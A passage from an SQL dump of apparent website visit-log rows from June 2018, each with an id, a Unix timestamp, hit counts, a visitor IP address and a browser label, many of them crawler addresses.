hrome'),(262017,1529912898,1,1,0,0,'62.205.134.182','other'),(262018,1529913068,1,1,0,0,'207.46.13.99','other'),(262019,1529913386,2,2,0,0,'141.8.142.74','other'),(262020,1529913761,1,1,0,0,'87.250.224.46','other'),(262021,1529914080,1,0,1,0,'66.249.64.29',''),(262022,1529914306,2,2,0,0,'199.58.86.206','other'),(262023,1529914445,2,2,0,0,'216.244.66.241','other'),(262024,1529914632,1,1,0,0,'157.55.39.137','other'),(262025,1529914913,1,1,0,0,'92.112.125.243','chrome'),(262026,1529914956,1,1,0,0,'109.108.78.135','chrome'),(262027,1529915041,1,1,0,0,'66.249.70.27','chrome'),(262028,1529915304,1,1,0,0,'91.124.182.170','firefox'),(262029,1529915459,1,1,0,0,'216.244.66.241','other'),(262030,1529915592,2,2,0,0,'91.196.178.93','chrome'),(262031,1529915605,1,0,1,0,'66.249.64.29',''),(262032,1529915693,1,1,0,0,'95.135.241.4','chrome'),(262033,1529915695,1,1,0,0,'62.205.134.182','other'),(262034,1529915750,2,2,0,0,'130.180.219.250','chrome'),(262035,1529916731,1,0,1,0,'66.249.64.30',''),(262036,1529916763,2,2,0,0,'62.205.134.182','other'),(262037,1529916913,1,1,0,0,'185.45.193.195','firefox'),(262038,1529917596,1,0,1,0,'66.249.70.29',''),(262039,1529917598,1,0,1,0,'66.249.70.25',''),(262040,1529917661,1,1,0,0,'8.29.198.27','other'),(262041,1529917703,2,2,0,0,'130.180.219.250','chrome'),(262042,1529917762,2,2,0,0,'62.205.134.182','other'),(262043,1529918783,8,8,0,0,'62.205.134.182','other'),(262044,1529919082,2,2,0,0,'141.8.142.74','other'),(262045,1529919294,1,1,0,0,'46.200.40.131','chrome'),(262046,1529919592,2,0,2,0,'66.249.64.30',''),(262047,1529919891,1,0,1,0,'66.249.64.29',''),(262048,1529920019,1,1,0,0,'141.8.142.74','other'),(262049,1529920353,1,1,0,0,'66.249.70.25','chrome'),(262050,1529920911,2,2,0,0,'91.196.178.78','chrome'),(262051,1529921193,1,1,0,0,'31.43.31.150','chrome'),(262052,1529921672,1,1,0,0,'141.8.142.74','other'),(262053,1529921735,1,0,1,0,'66.249.64.30',''),(262054,1529922035,1,1,0,0,'178.154.171.88','other'),(262055,1529922056,2,0,2,0,'66.249.64.28',''),(262056,1529922754,1,1,0,0,'195.93.190.92','other'),(262057,1529923006,8,8,0,0,'91.196.178.66','chrome'),(262058,1529923032,1,1,0,0,'178.154.171.88','other'),(262059,1529923444,1,1,0,0,'8.29.198.27','other'),(262060,1529923469,1,1,0,0,'216.244.66.241','other'),(262061,1529924692,1,1,0,0,'66.249.64.221','chrome'),(262062,1529924712,1,1,0,0,'141.8.142.74','other'),(262063,1529925032,1,1,0,0,'91.196.178.97','chrome'),(262064,1529925400,2,2,0,0,'91.196.178.78','chrome'),(262065,1529926171,1,1,0,0,'207.46.13.99','other'),(262066,1529926600,1,1,0,0,'194.44.130.202','chrome'),(262067,1529927007,2,0,2,0,'66.249.64.29',''),(262068,1529927338,4,4,0,0,'62.205.134.182','other'),(262069,1529927752,1,1,0,0,'216.244.66.241','other'),(262070,1529928002,1,1,0,0,'178.154.171.88','other'),(262071,1529928041,1,1,0,0,'66.249.64.29','chrome'),(262072,1529928093,1,1,0,0,'66.102.9.29','chrome'),(262073,1529928104,1,1,0,0,'31.42.161.141','chrome'),(262074,1529928187,1,1,0,0,'141.8.142.74','other'),(262075,1529928425,1,0,1,0,'66.249.64.28',''),(262076,1529928487,4,4,0,0,'62.205.134.182','other'),(262077,1529928492,1,1,0,0,'8.29.198.26','other'),(262078,1529928746,1,1,0,0,'216.244.66.241','other'),(262079,1529928843,1,1,0,0,'46.211.108.204','chrome'),(262080,1529928960,1,0,1,0,'66.249.64.29',''),(262081,1529929408,1,1,0,0,'91.196.178.182','chrome'),(262082,1529929419,1,1,0,0,'40.77.167.158','other'),(262083,1529929495,1,1,0,0,'109.108.78.135','chrome'),(262084,1529929900,3,3,0,0,'91.196.178.78','chrome'),(262085,1529929946,1,1,0,0,'66.249.70.27','chrome'),(262086,1529930286,1,1,0,0,'93.74.229.197','chrome'),(262087,1529930712,2,2,0,0,'46.219.77.169','chrome'),(262088,1529930835,1,1,0,0,'91.124.182.170','firefox'),(262089,1529931014,1,1,0,0,'91.196.178.130','firefox'),(262090,1529931021,2,2,0,0,'91.196.178.169','chrome'),(262091,1529931335,1,1,0,0,'62.205.134.182','other'),(262092,1529931373,1,1,0,0,'91.196.178.75','firefox'),(262093,1529931573,1,1,0,0,'91.196.179.65','other'),(262094,1529931715,1,1,0,0,'188.165.225.227','firefox'),(262095,1529931872,1,1,0,0,'141.8.142.74','other'),(262096,1529932556,1,1,0,0,'207.46.13.107','other'),(262097,1529932730,2,2,0,0,'62.205.134.182','other'),(262098,1529933662,3,3,0,0,'62.205.134.182','other'),(262099,1529933676,2,2,0,0,'40.77.167.158','other'),(262100,1529933681,3,3,0,0,'207.46.13.99','other'),(262101,1529933685,3,3,0,0,'157.55.39.137','other'),(262102,1529933704,22,22,0,0,'144.217.80.115','other'),(262103,1529933728,1,0,1,0,'66.249.64.28',''),(262104,1529933948,2,2,0,0,'141.8.142.74','other'),(262105,1529934237,1,1,0,0,'66.249.70.27','chrome'),(262106,1529934283,1,1,0,0,'8.29.198.27','other'),(262107,1529934717,1,0,1,0,'66.249.64.28',''),(262108,1529935101,1,0,1,0,'66.249.64.30',''),(262109,1529935624,1,0,1,0,'66.249.64.14',''),(262110,1529935732,1,1,0,0,'37.52.145.89','chrome'),(262111,1529936805,1,1,0,0,'178.154.171.88','other'),(262112,1529936852,2,0,2,0,'66.249.64.28',''),(262113,1529938051,1,1,0,0,'40.77.167.158','other'),(262114,1529938080,1,1,0,0,'31.43.21.181','chrome'),(262115,1529938305,1,0,1,0,'66.249.64.30',''),(262116,1529939221,1,0,1,0,'66.249.64.30',''),(262117,1529939315,1,1,0,0,'178.154.171.88','other'),(262118,1529939321,1,1,0,0,'8.29.198.26','other'),(262119,1529940284,1,0,1,0,'66.249.64.28',''),(262120,1529940735,2,1,1,0,'66.249.64.28',''),(262121,1529940793,1,1,0,0,'62.205.134.182','other'),(262122,1529941296,1,1,0,0,'141.8.142.74','other'),(262123,1529941328,1,0,1,0,'66.249.64.30',''),(262124,1529941518,1,0,1,0,'66.249.64.29',''),(262125,1529941755,1,1,0,0,'62.205.134.182','other'),(262126,1529943972,1,1,0,0,'87.250.224.46','other'),(262127,1529943979,2,2,0,0,'178.154.171.88','other'),(262128,1529944345,1,1,0,0,'66.249.64.30','chrome'),(262129,1529945138,1,1,0,0,'8.29.198.25','other'),(262130,1529945408,1,0,1,0,'66.249.64.30',''),(262131,1529945632,1,1,0,0,'66.249.70.27','chrome'),(262132,1529945874,1,0,1,0,'66.249.70.25',''),(262133,1529946217,1,0,1,0,'66.249.64.28',''),(262134,1529947041,2,0,2,0,'66.249.64.29',''),(262135,1529947162,1,1,0,0,'141.8.142.74','other'),(262136,1529947531,1,1,0,0,'178.154.171.88','other'),(262137,1529947868,1,1,0,0,'157.55.39.137','other'),(262138,1529949111,1,1,0,0,'40.77.167.158','other'),(262139,1529949441,1,1,0,0,'91.196.178.135','firefox'),(262140,1529949490,1,1,0,0,'178.154.171.88','other'),(262141,1529949541,1,1,0,0,'141.8.142.74','other'),(262142,1529950147,1,1,0,0,'8.29.198.25','other'),(262143,1529950403,1,1,0,0,'207.46.13.107','other'),(262144,1529950757,1,0,1,0,'66.249.64.30',''),(262145,1529950836,1,1,0,0,'66.249.70.29','chrome'),(262146,1529950856,2,2,0,0,'178.92.250.77','chrome'),(262147,1529950930,2,2,0,0,'216.244.66.241','other'),(262148,1529951473,3,3,0,0,'141.8.142.74','other'),(262149,1529951623,1,1,0,0,'40.77.167.158','other'),(262150,1529951643,1,1,0,0,'87.250.224.46','other'),(262151,1529951994,1,0,1,0,'66.249.64.30',''),(262152,1529952535,3,3,0,0,'216.244.66.241','other'),(262153,1529952736,1,1,0,0,'91.196.178.90','firefox'),(262154,1529953179,1,1,0,0,'180.76.15.15','other'),(262155,1529953894,1,1,0,0,'216.244.66.241','other'),(262156,1529954845,1,1,0,0,'141.8.142.74','other'),(262157,1529955174,1,1,0,0,'216.244.66.241','other'),(262158,1529955184,1,0,1,0,'66.249.70.29',''),(262159,1529955971,1,1,0,0,'8.29.198.25','other'),(262160,1529956472,1,1,0,0,'141.8.142.74','other'),(262161,1529957055,1,0,1,0,'66.249.64.30',''),(262162,1529957341,1,1,0,0,'195.18.28.212','firefox'),(262163,1529957409,1,1,0,0,'157.55.39.137','other'),(262164,1529957858,1,1,0,0,'66.249.64.29','chrome'),(262165,1529958296,1,1,0,0,'78.111.186.213','firefox'),(262166,1529958399,1,1,0,0,'157.55.39.137','other'),(262167,1529958742,1,1,0,0,'66.249.64.28','chrome'),(262168,1529959317,1,1,0,0,'178.154.171.88','other'),(262169,1529959405,1,1,0,0,'216.244.66.241','other'),(262170,1529960172,1,1,0,0,'141.8.142.74','other'),(262171,1529960222,1,1,0,0,'178.154.171.88','other'),(262172,1529960979,1,1,0,0,'8.29.198.26','other'),(262173,1529961123,1,1,0,0,'52.53.201.78','chrome'),(262174,1529962316,1,1,0,0,'207.46.13.99','other'),(262175,1529962568,1,1,0,0,'216.244.66.241','other'),(262176,1529963342,1,1,0,0,'66.249.64.29','chrome'),(262177,1529963723,1,1,0,0,'141.8.132.19','other'),(262178,1529964666,1,1,0,0,'141.8.142.74','other'),(262179,1529964669,1,1,0,0,'141.8.132.19','other'),(262180,1529965135,1,1,0,0,'180.76.15.33','other'),(262181,1529965969,1,1,0,0,'66.249.70.29','chrome'),(262182,1529966534,1,1,0,0,'216.244.66.241','other'),(262183,1529966801,1,1,0,0,'8.29.198.26','other'),(262184,1529966991,1,1,0,0,'207.46.13.99','other'),(262185,1529967396,1,0,1,0,'66.249.64.30',''),(262186,1529967426,1,0,1,0,'66.249.64.28',''),(262187,1529967533,2,2,0,0,'216.244.66.241','other'),(262188,1529968558,1,1,0,0,'37.9.113.182','other'),(262189,1529969350,1,1,0,0,'37.9.113.157','other'),(262190,1529969354,1,1,0,0,'178.154.200.73','other'),(262191,1529969437,1,1,0,0,'87.250.224.85','other'),(262192,1529969493,1,1,0,0,'178.154.171.88','other'),(262193,1529969716,2,2,0,0,'216.244.66.241','other'),(262194,1529969883,2,2,0,0,'141.8.142.74','other'),(262195,1529970501,1,1,0,0,'180.76.15.19','other'),(262196,1529970979,1,1,0,0,'93.80.63.198','msie'),(262197,1529971122,1,1,0,0,'178.154.171.88','other'),(262198,1529971612,1,1,0,0,'95.163.255.93','other'),(262199,1529971804,1,1,0,0,'8.29.198.26','other'),(262200,1529972456,2,0,2,0,'66.249.64.28',''),(262201,1529972795,2,2,0,0,'87.250.224.46','other'),(262202,1529972893,1,1,0,0,'141.8.142.74','other'),(262203,1529972910,1,0,1,0,'66.249.64.29',''),(262204,1529972941,1,1,0,0,'95.163.255.95','other'),(262205,1529973559,1,1,0,0,'216.244.66.241','other'),(262206,1529973749,1,1,0,0,'66.249.64.30','chrome'),(262207,1529973969,1,1,0,0,'66.249.70.25','chrome'),(262208,1529974189,1,1,0,0,'141.8.132.19','other'),(262209,1529976334,1,1,0,0,'173.249.24.45','firefox'),(262210,1529976987,1,1,0,0,'23.101.169.3','msie'),(262211,1529977638,1,1,0,0,'8.29.198.25','other'),(262212,1529978014,2,2,0,0,'216.244.66.241','other'),(262213,1529978132,1,0,1,0,'66.249.64.30',''),(262214,1529979079,3,3,0,0,'141.8.142.74','other'),(262215,1529979277,1,1,0,0,'37.144.153.8','firefox'),(262216,1529981210,2,2,0,0,'95.213.141.126','opera'),(262217,1529981221,1,1,0,0,'37.9.113.182','other'),(262218,1529982630,1,1,0,0,'8.29.198.26','other'),(262219,1529982824,1,1,0,0,'95.163.255.96','other'),(262220,1529983352,1,1,0,0,'66.249.64.29','chrome'),(262221,1529983382,1,1,0,0,'66.249.70.29','chrome'),(262222,1529984637,1,1,0,0,'95.163.255.96','other'),(262223,1529985349,1,1,0,0,'141.8.142.74','other'),(262224,1529985408,2,2,0,0,'87.250.224.46','other'),(262225,1529986289,3,3,0,0,'141.8.142.74','other'),(262226,1529986332,1,1,0,0,'178.154.171.88','other'),(262227,1529986370,1,1,0,0,'216.244.66.241','other'),(262228,1529986400,1,1,0,0,'66.249.70.27','chrome'),(262229,1529987692,1,1,0,0,'216.244.66.241','other'),(262230,1529987757,1,0,1,0,'66.249.64.28',''),(262231,1529988472,1,1,0,0,'8.29.198.26','other'),(262232,1529989139,1,1,0,0,'216.244.66.241','other'),(262233,1529989214,1,0,1,0,'66.249.64.28',''),(262234,1529990068,1,1,0,0,'66.249.64.28','chrome'),(262235,1529990087,1,1,0,0,'66.249.70.25','chrome'),(262236,1529990306,1,1,0,0,'37.9.113.157','other'),(262237,1529991014,23,23,0,0,'207.46.13.38','other'),(262238,1529991043,12,12,0,0,'207.46.13.36','other'),(262239,1529991055,10,10,0,0,'207.46.13.39','other'),(262240,1529991064,16,16,0,0,'157.55.39.210','other'),(262241,1529991718,1,1,0,0,'91.196.177.46','chrome'),(262242,1529991910,2,2,0,0,'216.244.66.241','other'),(262243,1529991961,1,1,0,0,'178.154.200.41','other'),(262244,1529992231,1,1,0,0,'46.133.178.234','chrome'),(262245,1529992233,1,1,0,0,'94.178.128.180','chrome'),(262246,1529992596,1,1,0,0,'207.46.13.39','other'),(262247,1529993273,1,1,0,0,'47.96.231.74','other'),(262248,1529993296,1,1,0,0,'216.244.66.241','other'),(262249,1529993456,1,1,0,0,'8.29.198.25','other'),(262250,1529993484,1,0,1,0,'66.249.64.29',''),(262251,1529993696,1,1,0,0,'91.196.178.93','firefox'),(262252,1529993748,1,1,0,0,'141.8.142.74','other'),(262253,1529993952,1,1,0,0,'157.55.39.210','other'),(262254,1529994573,2,2,0,0,'91.196.178.169','chrome'),(262255,1529994804,1,1,0,0,'95.133.251.202','chrome'),(262256,1529995013,1,1,0,0,'91.196.178.78','chrome'),(262257,1529995291,1,1,0,0,'46.30.165.43','firefox'),(262258,1529995367,1,1,0,0,'66.249.64.29','chrome'),(262259,1529995374,1,1,0,0,'66.249.70.29','chrome'),(262260,1529995489,4,4,0,0,'62.205.134.182','other'),(262261,1529995895,1,1,0,0,'216.244.66.241','other'),(262262,1529995901,1,0,1,0,'66.249.64.30',''),(262263,1529996132,1,1,0,0,'95.133.251.202','chrome'),(262264,1529996233,1,1,0,0,'54.165.59.7','other'),(262265,1529996399,1,1,0,0,'193.93.218.146','opera'),(262266,1529997357,1,1,0,0,'141.8.142.74','other'),(262267,1529997865,1,1,0,0,'193.93.218.146','opera'),(262268,1529997975,4,4,0,0,'62.205.134.182','other'),(262269,1529998072,1,1,0,0,'216.244.66.241','other'),(262270,1529998547,1,1,0,0,'91.124.182.170','firefox'),(262271,1529998852,1,0,1,0,'66.249.64.28',''),(262272,1529998899,2,2,0,0,'195.10.210.49','chrome'),(262273,1529998926,3,3,0,0,'62.205.134.182','other'),(262274,1529998993,1,1,0,0,'216.244.66.241','other'),(262275,1529999047,1,1,0,0,'54.165.59.7','other'),(262276,1529999063,1,0,1,0,'66.249.70.27',''),(262277,1529999278,1,1,0,0,'37.55.226.101','chrome'),(262278,1529999315,1,1,0,0,'8.29.198.27','other'),(262279,1529999870,1,1,0,0,'46.211.108.199','other'),(262280,1530000458,2,2,0,0,'62.205.134.182','other'),(262281,1530000683,1,1,0,0,'46.174.163.134','chrome'),(262282,1530000894,1,1,0,0,'95.163.255.99','other'),(262283,1530000932,1,1,0,0,'207.46.13.38','other'),(262284,1530001718,1,1,0,0,'178.154.171.88','other'),(262285,1530002202,1,1,0,0,'207.46.13.39','other'),(262286,1530002442,1,1,0,0,'94.178.128.180','chrome'),(262287,1530002444,1,1,0,0,'37.55.79.243','chrome'),(262288,1530002537,1,0,1,0,'66.249.64.30',''),(262289,1530002634,1,1,0,0,'216.244.66.241','other'),(262290,1530002800,1,1,0,0,'46.211.113.228','other'),(262291,1530002947,1,1,0,0,'91.196.178.130','firefox'),(262292,1530003008,2,0,2,0,'66.249.64.28',''),(262293,1530003232,1,1,0,0,'141.8.142.74','other'),(262294,1530003408,1,1,0,0,'178.154.171.88','other'),(262295,1530003584,1,1,0,0,'66.249.70.27','chrome'),(262296,1530003890,3,3,0,0,'216.244.66.241','other'),(262297,1530004141,2,2,0,0,'46.174.163.134','chrome'),(262298,1530004286,1,1,0,0,'8.29.198.25','other'),(262299,1530004346,1,0,1,0,'66.249.64.29',''),(262300,1530005170,1,1,0,0,'85.159.3.239','chrome'),(262301,1530005428,1,1,0,0,'66.249.70.27','chrome'),(262302,1530005917,3,3,0,0,'78.111.185.240','chrome'),(262303,1530006008,1,1,0,0,'178.154.171.88','other'),(262304,1530006403,2,2,0,0,'91.196.178.93','chrome'),(262305,1530006573,1,1,0,0,'194.44.166.185','chrome'),(262306,1530006872,1,0,1,0,'66.249.64.30',''),(262307,1530006907,2,2,0,0,'216.244.66.241','other'),(262308,1530007068,2,2,0,0,'141.8.142.74','other'),(262309,1530007761,1,0,1,0,'66.249.64.28',''),(262310,1530007900,1,0,1,0,'66.249.64.30',''),(262311,1530007961,1,1,0,0,'54.165.59.7','other'),(262312,1530008792,2,2,0,0,'216.244.66.241','other'),(262313,1530009601,1,1,0,0,'141.8.142.74','other'),(262314,1530010068,1,1,0,0,'216.244.66.241','other'),(262315,1530010129,2,2,0,0,'95.134.221.177','chrome'),(262316,1530010162,1,1,0,0,'8.29.198.26','other'),(262317,1530010391,1,0,1,0,'66.249.64.28',''),(262318,1530010493,2,2,0,0,'78.111.185.240','chrome'),(262319,1530010647,1,1,0,0,'141.8.142.74','other'),(262320,1530011110,2,2,0,0,'216.244.66.241','other'),(262321,1530011863,1,1,0,0,'66.249.70.27','chrome'),(262322,1530012232,1,1,0,0,'188.230.43.254','other'),(262323,1530012517,1,1,0,0,'66.249.64.28','chrome'),(262324,1530012972,1,1,0,0,'194.44.166.185','chrome'),(262325,1530013432,2,1,1,0,'66.249.64.30',''),(262326,1530013691,1,0,1,0,'66.249.64.28',''),(262327,1530013797,1,1,0,0,'141.8.142.74','other'),(262328,1530013825,2,2,0,0,'216.244.66.241','other'),(262329,1530013849,1,1,0,0,'91.196.178.65','firefox'),(262330,1530014251,1,0,1,0,'66.249.64.29',''),(262331,1530014380,1,1,0,0,'37.55.79.243','chrome'),(262332,1530015115,1,1,0,0,'8.29.198.25','other'),(262333,1530016336,2,2,0,0,'91.196.178.93','chrome'),(262334,1530016478,1,1,0,0,'92.113.52.170','firefox'),(262335,1530016869,1,0,1,0,'66.249.64.29',''),(262336,1530017158,1,1,0,0,'193.93.186.91','chrome'),(262337,1530017256,1,1,0,0,'77.52.14.163','chrome'),(262338,1530017612,1,1,0,0,'91.196.178.180','chrome'),(262339,1530018137,2,2,0,0,'216.244.66.241','other'),(262340,1530018327,2,2,0,0,'176.126.162.121','chrome'),(262341,1530018510,1,0,1,0,'66.249.70.27',''),(262342,1530018664,1,1,0,0,'91.196.178.180','chrome'),(262343,1530019018,1,1,0,0,'66.249.70.29','chrome'),(262344,1530019035,1,1,0,0,'66.249.64.30','chrome'),(262345,1530019422,1,1,0,0,'37.55.79.243','chrome'),(262346,1530019568,2,2,0,0,'216.244.66.241','other'),(262347,1530020999,1,1,0,0,'8.29.198.25','other'),(262348,1530021581,1,1,0,0,'54.36.148.55','other'),(262349,1530021753,1,1,0,0,'54.36.148.192','other'),(262350,1530021779,1,1,0,0,'54.36.149.36','other'),(262351,1530021920,1,1,0,0,'54.36.149.29','other'),(262352,1530022008,1,1,0,0,'92.113.52.170','firefox'),(262353,1530022298,1,0,1,0,'66.249.64.29',''),(262354,1530022365,1,1,0,0,'54.165.59.7','other'),(262355,1530022584,2,2,0,0,'91.196.178.169','chrome'),(262356,1530022732,1,1,0,0,'195.18.28.212','firefox'),(262357,1530022970,1,1,0,0,'54.36.148.56','other'),(262358,1530023213,1,1,0,0,'216.244.66.241','other'),(262359,1530023326,4,4,0,0,'62.205.134.182','other'),(262360,1530023442,1,1,0,0,'54.36.148.203','other'),(262361,1530023579,1,1,0,0,'91.227.206.15','chrome'),(262362,1530023719,1,1,0,0,'54.36.149.82','other'),(262363,1530023948,1,1,0,0,'188.230.43.254','other'),(262364,1530024083,1,1,0,0,'54.36.148.29','other'),(262365,1530024269,1,1,0,0,'62.205.134.182','other'),(262366,1530024352,1,1,0,0,'54.36.148.171','other'),(262367,1530024409,1,1,0,0,'54.36.148.109','other'),(262368,1530024604,1,1,0,0,'54.36.148.180','other'),(262369,1530024678,1,1,0,0,'54.36.149.57','other'),(262370,1530024723,1,1,0,0,'54.36.148.236','other'),(262371,1530024860,1,1,0,0,'66.249.64.28','chrome'),(262372,1530024884,1,1,0,0,'66.249.70.27','chrome'),(262373,1530024948,1,1,0,0,'54.36.148.14','other'),(262374,1530025115,1,1,0,0,'54.36.148.23','other'),(262375,1530025195,1,1,0,0,'54.36.148.119','other'),(262376,1530025242,1,1,0,0,'54.36.149.0','other'),(262377,1530025467,1,1,0,0,'54.36.148.172','other'),(262378,1530025485,1,1,0,0,'54.36.149.56','other'),(262379,1530025607,1,1,0,0,'54.36.148.162','other'),(262380,1530025675,1,1,0,0,'54.36.148.120','other'),(262381,1530025780,1,1,0,0,'207.46.13.36','other'),(262382,1530025951,1,1,0,0,'8.29.198.26','other'),(262383,1530025962,1,1,0,0,'178.154.171.88','other'),(262384,1530026084,1,1,0,0,'54.36.149.14','other'),(262385,1530026284,1,1,0,0,'54.36.148.43','other'),(262386,1530026350,1,1,0,0,'188.230.43.254','other'),(262387,1530026438,1,1,0,0,'54.36.148.27','other'),(262388,1530026484,1,1,0,0,'54.36.148.109','other'),(262389,1530026587,2,2,0,0,'54.36.148.242','other'),(262390,1530026606,1,1,0,0,'54.36.148.248','other'),(262391,1530027440,1,1,0,0,'54.36.148.49','other'),(262392,1530027668,1,1,0,0,'54.36.148.199','other'),(262393,1530027797,1,1,0,0,'54.36.148.161','other'),(262394,1530027902,1,1,0,0,'54.36.148.67','other'),(262395,1530027944,1,1,0,0,'54.36.148.252','other'),(262396,1530028101,1,1,0,0,'141.8.142.74','other'),(262397,1530028113,1,1,0,0,'54.36.149.15','other'),(262398,1530028352,1,1,0,0,'91.196.178.93','firefox'),(262399,1530028421,1,1,0,0,'54.36.148.139','other'),(262400,1530028431,1,1,0,0,'54.36.148.198','other'),(262401,1530028463,1,0,1,0,'66.249.70.29',''),(262402,1530028751,1,1,0,0,'188.230.43.254','other'),(262403,1530028985,2,2,0,0,'216.244.66.241','other'),(262404,1530029015,1,1,0,0,'66.249.70.25','chrome'),(262405,1530029248,1,1,0,0,'54.36.149.106','other'),(262406,1530029328,1,1,0,0,'54.36.149.68','other'),(262407,1530029355,1,1,0,0,'62.205.134.182','other'),(262408,1530029480,1,0,1,0,'66.249.64.30',''),(262409,1530029509,1,1,0,0,'54.36.149.34','other'),(262410,1530029612,1,1,0,0,'54.36.148.121','other'),(262411,1530029688,1,1,0,0,'54.36.148.83','other'),(262412,1530029715,1,1,0,0,'130.211.196.84','other'),(262413,1530030206,1,1,0,0,'54.36.149.57','other'),(262414,1530030305,1,1,0,0,'162.210.196.100','other'),(262415,1530030532,1,1,0,0,'54.36.149.11','other'),(262416,1530030538,1,1,0,0,'54.36.149.13','other'),(262417,1530030637,1,1,0,0,'54.36.148.179','other'),(262418,1530030688,1,1,0,0,'54.36.148.60','other'),(262419,1530030711,1,1,0,0,'54.36.148.91','other'),(262420,1530030817,2,2,0,0,'91.196.178.174','chrome'),(262421,1530030881,1,1,0,0,'95.163.255.117','other'),(262422,1530030891,1,1,0,0,'95.163.255.113','other'),(262423,1530030927,1,1,0,0,'95.163.255.108','other'),(262424,1530030946,1,1,0,0,'95.163.255.114','other'),(262425,1530031056,1,1,0,0,'54.36.149.14','other'),(262426,1530031110,1,1,0,0,'54.36.149.105','other'),(262427,1530031150,1,1,0,0,'188.230.43.254','other'),(262428,1530031156,1,1,0,0,'91.209.11.236','other'),(262429,1530031562,1,1,0,0,'54.36.148.22','other'),(262430,1530031634,1,1,0,0,'46.30.165.43','firefox'),(262432,1530031649,1,1,0,0,'216.244.66.241','other'),(262433,1530031736,1,1,0,0,'54.36.149.63','other'),(262434,1530031748,1,1,0,0,'178.154.171.88','other'),(262435,1530031842,1,1,0,0,'8.29.198.25','other'),(262436,1530031858,1,1,0,0,'66.249.70.27','chrome'),(262437,1530032001,1,1,0,0,'54.36.148.231','other'),(262438,1530032168,1,1,0,0,'54.36.148.162','other'),(262439,1530032627,1,0,1,0,'66.249.70.29',''),(262440,1530032880,2,2,0,0,'54.165.59.7','other'),(262441,1530032943,1,1,0,0,'54.36.148.168','other'),(262442,1530033389,1,1,0,0,'37.9.113.110','other'),(262443,1530033431,1,1,0,0,'54.36.149.17','other'),(262444,1530033549,1,1,0,0,'188.230.43.254','other'),(262445,1530033638,1,1,0,0,'54.36.148.172','other'),(262446,1530033905,1,1,0,0,'54.36.148.176','other'),(262447,1530034042,1,1,0,0,'178.154.171.88','other'),(262448,1530034047,1,1,0,0,'141.8.142.74','other'),(262449,1530034193,1,1,0,0,'54.36.148.39','other'),(262450,1530034242,1,1,0,0,'54.36.148.225','other'),(262451,1530034289,1,1,0,0,'54.36.148.83','other'),(262452,1530034336,1,1,0,0,'54.36.148.59','other'),(262453,1530034505,1,1,0,0,'216.244.66.241','other'),(262454,1530034575,1,1,0,0,'54.36.148.140','other'),(262455,1530034912,1,1,0,0,'54.36.149.78','other'),(262456,1530035082,1,1,0,0,'54.36.148.11','other'),(262457,1530035085,1,1,0,0,'66.249.64.30','chrome'),(262458,1530035123,1,1,0,0,'54.36.148.117','other'),(262459,1530035323,1,1,0,0,'54.36.148.237','other'),(262460,1530035343,1,1,0,0,'54.36.149.9','other'),(262461,1530035353,1,1,0,0,'54.36.148.84','other'),(262462,1530035520,1,1,0,0,'54.36.149.94','other'),(262463,1530035572,1,1,0,0,'54.36.148.167','other'),(262464,1530035608,1,1,0,0,'54.36.149.101','other'),(262465,1530035631,1,1,0,0,'54.36.148.40','other'),(262466,1530035684,2,2,0,0,'91.196.178.177','chrome'),(262467,1530035715,2,2,0,0,'216.244.66.241','other'),(262468,1530035727,1,1,0,0,'141.8.132.19','other'),(262469,1530035749,1,1,0,0,'54.36.149.56','other'),(262470,1530035822,1,1,0,0,'54.36.148.26','other'),(262471,1530035967,1,1,0,0,'188.230.43.254','other'),(262472,1530036664,1,1,0,0,'178.154.171.88','other'),(262473,1530036690,1,1,0,0,'37.9.113.182','other'),(262474,1530036740,1,1,0,0,'66.249.70.29','chrome'),(262475,1530036776,1,1,0,0,'8.29.198.27','other'),(262476,1530037254,1,1,0,0,'54.165.59.7','other'),(262477,1530037409,1,1,0,0,'216.244.66.241','other'),(262478,1530037465,1,1,0,0,'141.8.142.74','other'),(262479,1530037468,1,1,0,0,'87.250.224.46','other'),(262480,1530037570,1,1,0,0,'66.102.9.25','chrome'),(262481,1530037629,1,1,0,0,'54.36.148.13','other'),(262482,1530037636,1,1,0,0,'54.36.148.72','other'),(262483,1530037688,1,1,0,0,'54.36.148.148','other'),(262484,1530037736,1,1,0,0,'54.36.149.11','other'),(262485,1530037883,1,0,1,0,'66.249.64.29',''),(262486,1530038038,1,1,0,0,'54.36.148.234','other'),(262487,1530038358,1,1,0,0,'54.36.148.133','other'),(262488,1530038373,2,2,0,0,'216.244.66.241','other'),(262489,1530038751,1,1,0,0,'54.36.148.137','other'),(262490,1530038834,1,1,0,0,'54.36.148.185','other'),(262491,1530039040,1,1,0,0,'54.36.149.50','other'),(262492,1530039061,1,1,0,0,'54.36.149.55','other'),(262493,1530039076,1,1,0,0,'54.36.148.141','other'),(262494,1530039262,1,1,0,0,'54.36.148.144','other'),(262495,1530039402,1,0,1,0,'66.249.64.29',''),(262496,1530039424,1,1,0,0,'54.36.148.166','other'),(262497,1530039611,1,1,0,0,'54.36.148.143','other'),(262498,1530039625,2,2,0,0,'178.154.171.88','other'),(262499,1530039687,1,1,0,0,'54.36.148.69','other'),(262500,1530039802,1,1,0,0,'216.244.66.241','other'),(262501,1530040063,1,1,0,0,'54.36.148.192','other'),(262502,1530040396,1,1,0,0,'54.36.148.82','other'),(262503,1530040530,1,1,0,0,'54.36.148.221','other'),(262504,1530040623,1,0,1,0,'66.249.64.28',''),(262505,1530040696,1,1,0,0,'54.36.148.38','other'),(262506,1530040750,1,1,0,0,'178.154.171.88','other'),(262507,1530040755,1,1,0,0,'54.36.148.252','other'),(262508,1530041323,1,1,0,0,'54.36.149.98','other'),(262509,1530041409,1,1,0,0,'54.36.148.225','other'),(262510,1530041432,1,1,0,0,'54.36.148.59','other'),(262511,1530041593,1,1,0,0,'54.36.149.71','other'),(262512,1530041772,1,1,0,0,'110.54.243.113','firefox'),(262513,1530041892,1,1,0,0,'54.36.149.66','other'),(262514,1530041999,1,1,0,0,'54.36.149.31','other'),(262515,1530042057,1,1,0,0,'54.36.148.13','other'),(262516,1530042148,1,1,0,0,'54.36.148.17','other'),(262517,1530042227,1,1,0,0,'54.36.148.174','other'),(262518,1530042254,1,1,0,0,'95.163.255.93','other'),(262519,1530042490,2,2,0,0,'54.36.149.44','other'),(262520,1530042542,1,1,0,0,'54.36.148.240','other'),(262521,1530042596,1,1,0,0,'54.36.148.203','other'),(262522,1530042616,1,1,0,0,'54.36.149.58','other'),(262523,1530042692,1,1,0,0,'8.29.198.27','other'),(262524,1530042771,1,1,0,0,'54.36.148.237','other'),(262525,1530043038,1,1,0,0,'141.8.142.74','other'),(262526,1530043063,1,1,0,0,'54.36.149.17','other'),(262527,1530043139,1,1,0,0,'54.36.148.96','other'),(262528,1530043262,1,1,0,0,'54.36.148.238','other'),